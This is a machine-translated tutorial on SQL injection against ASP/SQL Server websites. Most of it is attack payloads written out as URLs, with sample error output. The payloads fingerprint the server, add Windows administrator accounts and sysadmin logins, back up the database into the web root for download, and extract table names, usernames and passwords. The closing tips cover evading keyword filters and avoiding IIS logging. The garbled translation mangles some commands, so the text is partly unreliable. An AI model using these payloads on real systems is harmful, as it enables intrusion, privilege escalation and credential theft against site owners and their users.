With the development of B / S mode application development, programmers who use this model to write applications have become more and more. However, due to the high entry threshold in this industry, the level and experience of programmers are uneven. A considerable part of the programmer does not judge the legality of the user input data when writing code, so that the application has security hazards. Users can submit a database query code, obtain some data he wants, based on the result returned by the program, which is the so-called SQL Injection.
SQL Injection Attack is a regular attack, which allows some unscrupulous users to retrieve your data, changing the server's settings, or black down your server when you are not careful. SQL injection attack is not a SQL Server problem, but an inappropriate program. If you want to run these programs, you must understand that this is a certain risk.
First, principle
Learn about SQL injection, you must understand some of the basic B / S mode applications, as well as related knowledge of browser and server interaction. According to national conditions, domestic websites use ASP Access or SQL Server to account for more than 70%, PHP MySQL accounts for 20%, and there are less than 10% of others. For the application structure of the ASP SQL Server, an ASP program is actually a client of SQL Server, which requires a legitimate SQL login name and password to connect to the SQL Server database. The following segment is an example of a typical connection to SQL Server in ASP:
<% RServer = "IBM-WEB-01" Set SQL Server Server Address
Ruid = "Webuser" 'Settings SQL Server Login Name
RPWD = "xxxxxxxxf" Set SQL Server Login Password
RDATABASE = "SiteLog" "Sets the SQL Server Database Name
Set conn = server.createObject ("adoDb.connection")
The fragile point of SQL injection occurs when the program developer constructs a WHERE clause to accompany the user's input. For example, the following list lists a simple ASP program article_show.asp, which is the article content of the corresponding ID value in the database info_archic table according to the parameter ID obtained by the GET.
<% strid = trim (Request.QueryString ("ID")))
strsql = "SELECT * from info_Article where id =" & strid
SET RS = Server.createObject ("AdoDb.Recordset")
RS.Open Strsql, CONN, 1, 3%>
<% = rs ("title")%> div> td>
TR>
<% = rs ("content")%> td>
TR>
TABLE>
Note strsql = "select * from info_archicle where id =" & strid this sentence. When actually run, the client should use the URL like http://www.abc.com/Article_show.asp?id=12 to access this ASP program, when the ID is the number 12, the value of the strID is a character type "12" The "&" operator in VBScript can connect any type of data. After the &'s connection, you can get the value of the strsql string: select * from info_Article where id = 12, you can see that this is a normal SQL statement. VBScript is a weak type of language that does not need to declare variables (even without declared variables), this sometimes brings convenience to the programmer, but it is easy to produce a lot of exploitable vulnerabilities during programming. Since there is no type of variable StrID in this program, this program has a vulnerability of SQL injection.
Second, test
Now try to enter the following URL "http://www.abc.com/article_show.asp?id=) in the browser
12 '
", At this time, the value of the STRSQL string is: SELECT * from info_Article where id =
12 '
This is an illegal query statement in SQL Server. At this time, the server will return the following error:
Microsoft OLE DB Provider for ODBC Drivers Errors '80040e14'
[Microsoft] [ODBC SQL Server Driver] [SQL Server] string '' has no closed quotes.
This kind of error has already explained that this website can be injected into injection.
Sometimes the server displays "Processing URL When the server is on the server" is because the IIS settings are closed to send detailed error messages to the client, it is not necessarily injected, but relatively difficult is extremely difficult, can only touch it.
Sometimes the content displayed by the server is still the content of ID = 12, there is no error message, which may be that the developer filters out single quotes, you can use the following method: "Article_show.asp? Id = 12 and 1 =
2
"
At this time, if the following error occurs, it is possible to inject.
Error '80020009'
accident.
Note: If the following error message appears, it will definitely not complete the injection:
Microsoft VBScript runtime error error '
800A
000d '
Type mismatch: 'CINT'microsoft VBScript runtime error error'
800A
000d '
Type mismatch: 'clng'
Microsoft VBScript runtime error error '
800A
000d '
Type mismatch: 'CDBL'
Microsoft VBScript runtime error error '
800A
000d '
Type mismatch: 'c'
Illegal parameter values.
Please enter the correct parameter value.
AdoDb.Parameter Error '
800A
0D5D '
Application uses a value of the wrong type for the current operation.
Third, collect information
After determining that the injection attack can be implemented, the server can be tested using the following method.
Test SQL Server version:
Article_show.asp? id = (SELECT @@ Version)
Microsoft OLE DB Provider for ODBC Drivers Errors '80040E07'
[Microsoft] [ODBC SQL Server Driver] [SQL Server] NVARCHAR VAT 'Microsoft SQL Server 2000 - 8.00.760 (Intel x86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4) The syntax error occurs when converted to a column of data type INT.
Test SQL Server Current Login User Name:
Article_show.asp? id = (user_name ())
Microsoft OLE DB Provider for ODBC Drivers Errors '80040E07'
[Microsoft] [ODBC SQL Server Driver] [SQL Server] Converts nvarChar Value 'WebUser' to the column of data type Int to INT.
Note: If it is logged in with sa, DBO will be displayed.
Test the database name currently used by SQL Server:
Article_show.asp? id = (db_name ())
Microsoft OLE DB Provider for ODBC Drivers Errors '80040E07'
[Microsoft] [ODBC SQL Server Driver] [SQL Server] transitions nvarChar value 'SiteLog' to a quotient error when the data type INT is an int.
Test if the current user is a "sysadmin" group member
SELECT IS_SRVROLEMEMBER ('sysadmin') SQL statement can be used to test if the currently logged in user is a server role of sysadmin, if it is a return value 1, not, return value 0. Here to transform it into character data to see specific values. Therefore, write the following URL: (where the char (115) is the character 's',% 2b is the UTF-8 encoding of the plus ( ).)
Article_show.asp? id = (SELECT Char (115)% 2B Cast (is_srvrolemember ('sysadmin') as varchar (2))))
Microsoft OLE DB Provider for ODBC DRIVERS Errors '80040E07' [Microsoft] [ODBC SQL Server Driver] [SQL Server] converts the varchar value 's0' to the column of the data type INT, a syntax error occurs.
If S0 is displayed, it is not a 'sysadmin' group member, if it is'
1'
Is a member of 'sysadmin' group.
Test if the current user is a member of the "DB_OWNER" group.
Article_show.asp? id = (SELECT CHAR (115)% 2B Cast (is_member ('db_owner') as varchar (2))))
Microsoft OLE DB Provider for ODBC Drivers Errors '80040E07'
[Microsoft] [ODBC SQL Server Driver] [SQL Server] transitions the varchar value 's1' to the column of the data type INT.
There have been many valuable information until this. If you test the current user as a member of the Sysadmin group, there is a lot of possibilities to run the CMD shell on this SQL Server. If DB_OWNER, you can perform any operations of the currently connected database, such as new tables, delete tables, insert data, read data, and more.
Fourth, users of sysadmin privileges can do
Note: The following is no longer detailed in detail the error information of the server, only listing the available SQL statements.
Add a NT user:
Article_show.asp? id = 12; exec master "Net user name password / add" -
Add this user to the Administrators group
ARTICLE_SHOW.ASP? ID = 12; exec master "Net localgroup name administrators / add" -
Make a complete backup of the database to the website directory for download:
Article_show.asp? id = 12; Backup Database Database name to disk = 'c: /inetpub/wwwroot/1.db'; -
Add a SQL Server Login:
Article_show.asp? id = 12; exec sp_addlogin 'uname', 'PWD' -
Article_show.asp? id = 12; exec sp_addsrvroleMember 'uname', 'sysadmin' -
Converse operation:
Remove this login from the SYSADMIN fixed server role:
Article_show.asp? id = 12; exec sp_dropsrvroleMember 'uname', 'sysadmin' -
Remove this login from the DB_OWNER role:
Article_show.asp? id = 12; exec sp_dropuser 'uname'
Delete this login:
Article_show.asp? id = 12; EXEC SP_DROPLOGIN 'Uname'
The above operation General server will appear below or the web page of ID = 12 normally: Error '80020009'
accident.
V. Ordinary authority users can do:
Ordinary users cannot use the commands listed in Section IV, but still read all the data in the database.
Use the following statements to list the names of the first table in the database:
Article_show.asp? id = (Select Top 1 Name from sysobjects where xtype = 'u' and status> 0 and name not in (''))
After getting the first table name INFO_FILES, you get the second table name with the following statement:
Article_show.asp? id = (Select Top 1 Name from sysobjects where xtype = 'u' and status> 0 and name not in ('info_files'))
After getting the second table name INFO_ARTICLES, use the following statement to get the third table name:
Article_show.asp? id = (select top 1 name from sysobjects where xtype = 'u' and status> 0 and name not in ('Info_files', 'Info_Articles'))
Assume that the third table name is INFO_USERS
Use the following statement to get the name of the first field in the INFO_USERS table:
Article_show.asp? id = (select col_name (Object_ID ('Info_USERS'), 1)
Use the following statement to get the second field name in the INFO_USERS table:
Article_show.asp? id = (select col_name (Object_ID ('Info_USERS'), 2)
Assuming to get the structure of the Info_Users table is ID, UserName, Password, then, use the following statement to get the first recorded username value:
Article_show.asp? id = (Select Top 1 UserName from Info_USERS)
Use the following statement to get the first recorded Password value:
Article_show.asp? id = (Select Top 1 Password from Info_USERS)
Use the following statement to get the ID value of the first record:
Article_show.asp? id = (SELECT TOP 1 Char (115)% 2B Cast (ID as varchar (2)) from info_users
Sixth, additional instructions
There are also many developers to "prevent" to inject vulnerabilities with the method of filtering, but can also be used to reach the purpose of the program limit. For example, let's see how to transform these statements:
Simple, like WHERE XTYPE = 'u', the ASCII code corresponding to the character u is 85, so you can use where xtype = char (85) instead; if the character is Chinese, such as where name = 'user', you can use where name = Nchar (29992) NCHAR (25143) instead.
Some people will filter these keywords, but forget the case sensitive, so everyone can try it with SELECT.
When you can't guess the field name, you may wish to look at the login form on the website, which is generally the same name and the input box of the form. Special note: The number of the address bar is interpreted as space, the% 2B is interpreted as number, and the% 25 is explained as% number, and the specifically can be referred to Urlencode.
When injecting GET method, IIS will record all your submission strings, do not log on the POST method, so you can use the URL of the POST without GET.
SQL Server's injection attack is not limited to these described above, you can use your own way to make a lot of smart SQL statements you want. After installing SQL Server, you can view the "SQL Server online from book", which can find all statements, functions, system stored procedures, and security documents in SQL Server, are very good reference materials.